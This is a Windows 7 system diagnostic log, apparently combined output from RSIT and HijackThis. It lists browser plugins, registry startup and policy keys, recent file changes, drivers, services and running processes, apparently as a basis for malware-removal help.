"Path"=C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE]
"Description"=
"Path"=disabled
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.6]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.8]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.0]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.2]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\Adobe Reader]
"Description"=Handles PDFs in-place in Firefox
"Path"=C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 30.0.0.154 Plugin
"Path"=C:\Windows\system32\Macromed\Flash\NPSWF64_30_0_0_154.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/DTPlugin,version=11.172.2]
"Description"=Java™ Deployment Toolkit
"Path"=C:\Program Files\Java\jre1.8.0_172\bin\dtplugin\npDeployJava1.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/JavaPlugin,version=11.172.2]
"Description"=Oracle® Next Generation Java™ Plug-In
"Path"=C:\Program Files\Java\jre1.8.0_172\bin\plugin2\npjp2.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/GENUINE]
"Description"=
"Path"=disabled
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.1.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.1.5]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.0]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.2]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.4]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.5.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
C:\Program Files (x86)\Mozilla Firefox\plugins\
nppdf32.dll
C:\Users\Drone\AppData\Roaming\Mozilla\Firefox\Profiles\3gv1swpa.default-1479997392283\extensions\
cs@dictionaries.addons.mozilla.org
======Registry dump======
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre1.8.0_172\bin\ssv.dll [2018-04-25 582088]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2018-05-24 958328]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre1.8.0_172\bin\jp2ssv.dll [2018-04-25 245192]
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2018-05-24 820672]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"AvastUI.exe"=C:\Program Files\AVAST Software\Avast\AvLaunch.exe [2018-05-24 242904]
[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"=C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [2013-10-08 766208]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"=credssp.dll
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\prwntdrv]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\prwntdrv]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=5
"ConsentPromptBehaviorUser"=3
"EnableUIADesktopToggle"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"SoftwareSASGeneration"=1
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoSimpleNetIDList"=1
"NoDriveTypeAutoRun"=221
"NoDrives"=0
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDrives"=0
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"msacm.msadpcm"=msadp32.acm
"midimapper"=midimap.dll
"wavemapper"=msacm32.drv
"vidc.uyvy"=msyuv.dll
"vidc.yuy2"=msyuv.dll
"vidc.yvyu"=msyuv.dll
"vidc.iyuv"=iyuv_32.dll
"vidc.i420"=iyuv_32.dll
"vidc.yvu9"=tsbyuv.dll
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"vidc.mjpg"=bdmjpeg64.dll
"vidc.mpeg"=bdmpegv64.dll
"msacm.bdmpeg"=bdmpega64.acm
"VIDC.FPS1"=frapsv64.dll
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv
======File associations======
.js - edit - C:\Windows\System32\Notepad.exe %1
======List of files/folders created in the last 1 month======
2018-09-05 18:40:02 ----D---- C:\_OTM
2018-09-04 20:51:41 ----A---- C:\Windows\ntbtlog.txt
2018-09-04 20:33:45 ----D---- C:\AdwCleaner
2018-09-04 17:05:14 ----D---- C:\rsit
2018-09-03 14:19:18 ----D---- C:\Windows\{EB47D3E9-14CE-4BE0-B16B-C061571F46C7}
2018-09-02 16:15:31 ----D---- C:\9df5ec6646e5f65a782b5ad04331
2018-09-02 11:10:32 ----D---- C:\Windows\{D32F0790-E651-41F4-9571-6065DA044B85}
2018-09-01 20:53:51 ----D---- C:\Program Files\VS Revo Group
2018-09-01 20:28:40 ----N---- C:\Windows\SYSWOW64\mfc71.dll
2018-08-29 15:10:58 ----D---- C:\Windows\{B58AFBDA-7D5B-40C0-BE79-D9F3286E2165}
2018-08-25 09:52:05 ----D---- C:\Windows\{2E03268B-4782-44EF-B29B-44B65D240959}
2018-08-22 18:51:23 ----D---- C:\Windows\{386B5B3F-9B0C-4C98-A35A-9D30F4B40497}
2018-08-14 21:52:56 ----D---- C:\Windows\{C0DBEF00-2BEB-4F04-B2D3-8007390D5C0B}
2018-08-10 14:47:32 ----D---- C:\Windows\{6CD4963C-603E-45BC-A07A-EB9A6137CC9A}
2018-08-07 13:48:33 ----D---- C:\Windows\{9313CB30-7832-4851-AF74-A21456C4EF2A}
======List of files/folders modified in the last 1 month======
2018-09-05 18:50:01 ----D---- C:\Program Files\trend micro
2018-09-05 18:49:02 ----D---- C:\Windows\Temp
2018-09-05 18:43:04 ----SHD---- C:\Windows\Installer
2018-09-05 18:43:04 ----SHD---- C:\Config.Msi
2018-09-05 18:42:36 ----D---- C:\Windows\SysWOW64
2018-09-05 18:42:36 ----D---- C:\Windows
2018-09-04 16:26:00 ----D---- C:\Users\Drone\AppData\Roaming\MPC-HC
2018-09-04 14:00:23 ----D---- C:\Windows\system32\LogFiles
2018-09-04 13:57:19 ----D---- C:\Windows\Prefetch
2018-09-03 22:07:02 ----D---- C:\Users\Drone\AppData\Roaming\PhotoScape
2018-09-03 20:28:28 ----D---- C:\Windows\rescache
2018-09-03 17:08:24 ----D---- C:\Windows\SYSWOW64\Macromed
2018-09-02 20:42:57 ----D---- C:\Windows\inf
2018-09-02 20:42:54 ----D---- C:\Windows\Minidump
2018-09-02 19:39:45 ----D---- C:\Windows\system32\config
2018-09-02 19:38:34 ----D---- C:\Windows\winsxs
2018-09-02 19:32:55 ----D---- C:\Windows\system32\catroot2
2018-09-02 19:09:26 ----D---- C:\Windows\System32
2018-09-02 19:09:26 ----A---- C:\Windows\system32\PerfStringBackup.INI
2018-09-02 19:01:32 ----D---- C:\Windows\SYSWOW64\cs-CZ
2018-09-02 19:01:32 ----D---- C:\Program Files\Internet Explorer
2018-09-02 19:01:31 ----D---- C:\Windows\SYSWOW64\en-US
2018-09-02 19:01:30 ----D---- C:\Windows\system32\drivers
2018-09-02 19:01:30 ----D---- C:\Windows\system32\cs-CZ
2018-09-02 19:01:29 ----D---- C:\Windows\system32\en-US
2018-09-02 19:01:27 ----D---- C:\Windows\AppPatch
2018-09-02 19:01:27 ----D---- C:\Program Files (x86)\Internet Explorer
2018-09-02 19:01:26 ----D---- C:\Windows\system32\Boot
2018-09-02 19:01:22 ----D---- C:\Windows\system32\DriverStore
2018-09-02 18:25:57 ----D---- C:\Windows\system32\CodeIntegrity
2018-09-01 21:44:27 ----RD---- C:\Program Files (x86)
2018-09-01 21:02:13 ----D---- C:\Users\Drone\AppData\Roaming\uTorrent
2018-09-01 21:02:12 ----D---- C:\Users\Drone\AppData\Roaming\Seznam.cz
2018-09-01 20:53:51 ----D---- C:\Program Files
2018-08-28 15:08:59 ----SD---- C:\ProgramData\Microsoft
2018-08-26 15:08:15 ----D---- C:\Users\Drone\AppData\Roaming\vlc
2018-08-23 14:22:53 ----D---- C:\Windows\system32\Tasks
2018-08-14 21:51:03 ----A---- C:\Windows\SYSWOW64\FlashPlayerApp.exe
2018-08-14 21:50:54 ----D---- C:\Windows\system32\Macromed
2018-08-12 12:03:29 ----D---- C:\Program Files (x86)\Mozilla Maintenance Service
2018-08-12 12:03:29 ----D---- C:\Program Files (x86)\Mozilla Firefox
2018-08-11 14:57:07 ----D---- C:\Program Files (x86)\Common Files
2018-08-10 21:58:02 ----RSD---- C:\Windows\assembly
2018-08-06 22:57:04 ----D---- C:\Windows\{7CB0BBD3D374-4DEA-9751-2D08BC721AA7}
======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R0 aswbidsh;aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [2018-05-24 199440]
R0 aswblog;aswblog; C:\Windows\system32\drivers\aswbloga.sys [2018-05-24 343752]
R0 aswbuniv;aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [2018-05-24 57680]
R0 aswRvrt;aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [2018-05-24 85968]
R0 aswVmm;aswVmm; C:\Windows\system32\drivers\aswVmm.sys [2018-05-24 381552]
R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2018-01-01 213736]
R1 aswArPot;aswArPot; C:\Windows\system32\drivers\aswArPot.sys [2018-05-24 196640]
R1 aswbidsdriver;aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [2018-05-24 227504]
R1 aswHdsKe;aswHdsKe; C:\Windows\system32\drivers\aswHdsKe.sys [2018-05-24 234560]
R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [2018-05-24 111360]
R1 aswSnx;aswSnx; C:\Windows\system32\drivers\aswSnx.sys [2018-05-24 1027720]
R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2018-05-24 460520]
R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2012-01-12 514560]
R2 aswMonFlt;aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [2018-05-24 159120]
R2 aswStm;aswStm; C:\Windows\system32\drivers\aswStm.sys [2018-05-24 205976]
R2 npf;NetGroup Packet Filter Driver; C:\Windows\system32\drivers\npf.sys [2011-02-11 35344]
R3 amdkmdag;amdkmdag; C:\Windows\system32\DRIVERS\atikmdag.sys [2013-10-08 12534784]
R3 amdkmdap;amdkmdap; C:\Windows\system32\DRIVERS\atikmpag.sys [2013-10-08 619008]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service; C:\Windows\system32\drivers\AtihdW76.sys [2016-04-01 104976]
R3 RTL8167;Realtek 8167 NT Driver; C:\Windows\system32\DRIVERS\Rt64win7.sys [2009-03-01 187392]
S3 aswHwid;aswHwid; C:\Windows\system32\drivers\aswHwid.sys [2018-05-24 46968]
S3 BridgeMP;@%SystemRoot%\system32\bridgeres.dll,-1; C:\Windows\system32\DRIVERS\bridge.sys [2012-01-12 95232]
S3 dmvsc;dmvsc; C:\Windows\system32\drivers\dmvsc.sys [2010-11-21 71168]
S3 pciide;pciide; C:\Windows\system32\drivers\pciide.sys [2009-07-14 12352]
S3 prwntdrv;prwntdrv; \??\C:\Windows\syswow64\prwntdrv.sys [2014-10-23 15456]
S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2012-01-12 165888]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver; C:\Windows\System32\drivers\rdpvideominiport.sys [2012-08-23 19456]
S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys [2010-11-21 6656]
S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys [2010-11-21 34688]
S3 TsUsbFlt;TsUsbFlt; C:\Windows\system32\drivers\tsusbflt.sys [2013-10-02 56832]
S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys [2012-08-23 30208]
S3 vmbus;vmbus; C:\Windows\system32\drivers\vmbus.sys [2010-11-21 199552]
S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys [2010-11-21 21760]
======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2018-03-21 83984]
R2 AMD External Events Utility;AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [2013-10-08 239616]
R2 avast! Antivirus;Avast Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2018-05-24 317280]
R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2012-01-12 27648]
R2 DiagTrack;@%SystemRoot%\system32\UtcResources.dll,-3001; C:\Windows\System32\svchost.exe [2012-01-12 27648]
R3 aswbIDSAgent;aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [2018-05-24 7620096]
S2 avast;Služba %1!s! Update (avast); C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [2018-06-13 164984]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2017-04-21 107656]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2017-04-21 128648]
S2 gupdate;Služba Google Update (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-12-17 153752]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-08-14 335872]
S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2012-01-12 27648]
S3 avastm;Služba %1!s! Update (avastm); C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [2018-06-13 164984]
S3 gupdatem;Služba Google Update (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-12-17 153752]
S3 gusvc;Google Updater Service; C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe [2015-02-13 136120]
S3 IEEtwCollectorService;@%SystemRoot%\system32\ieetwcollectorres.dll,-1000; C:\Windows\system32\IEEtwCollector.exe [2017-12-29 116224]
S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2018-08-11 194512]
S3 ose;Office Source Engine; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2003-07-28 89136]
S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 StorSvc;@%SystemRoot%\System32\StorSvc.dll,-100; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 WatAdminSvc;@%SystemRoot%\system32\Wat\WatUX.exe,-601; C:\Windows\system32\Wat\WatAdminSvc.exe [2013-10-30 1255736]
S4 aspnet_state;Stavová služba ASP.NET; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2017-04-21 52856]
S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
-----------------EOF-----------------
Logfile of random's system information tool 1.10 (written by random/random)
Run by Drone at 2018-09-05 18:49:51
Microsoft Windows 7 Professional Service Pack 1
System drive C: has 47 GB (20%) free of 238 GB
Total RAM: 4094 MB (70% free)
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 18:50:05, on 5.9.2018
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.18894)
Boot mode: Normal
Running processes:
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Program Files\trend micro\Drone.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkI ... id=UE12DHP
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: aswbIDSAgent - AVAST Software - C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
O23 - Service: Služba %1!s! Update (avast) (avast) - AVAST Software - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe
O23 - Service: Avast Antivirus (avast! Antivirus) - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: Služba %1!s! Update (avastm) (avastm) - AVAST Software - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 5495 bytes
======Listing Processes======
\SystemRoot\System32\smss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
wininit.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
winlogon.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
atieclxx
C:\Windows\system32\svchost.exe -k NetworkService
"C:\Program Files\AVAST Software\Avast\AvastSvc.exe"
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
C:\Windows\System32\spoolsv.exe
"taskhost.exe"
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
taskeng.exe {E394D705-711F-45EE-B5D9-8E4C8B8379D5}
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
C:\Windows\System32\svchost.exe -k utcsvc
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
"C:\Program Files (x86)\AVAST Software\Browser\Update\1.4.141.333\AvastBrowserCrashHandler.exe"
"C:\Program Files (x86)\AVAST Software\Browser\Update\1.4.141.333\AvastBrowserCrashHandler64.exe"
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\SearchIndexer.exe /Embedding
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
AvastUI.exe /nogui
"C:\Program Files\AVAST Software\Avast\setup\instup.exe" /instop:update_vps
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
C:\Windows\system32\wbem\unsecapp.exe -Embedding
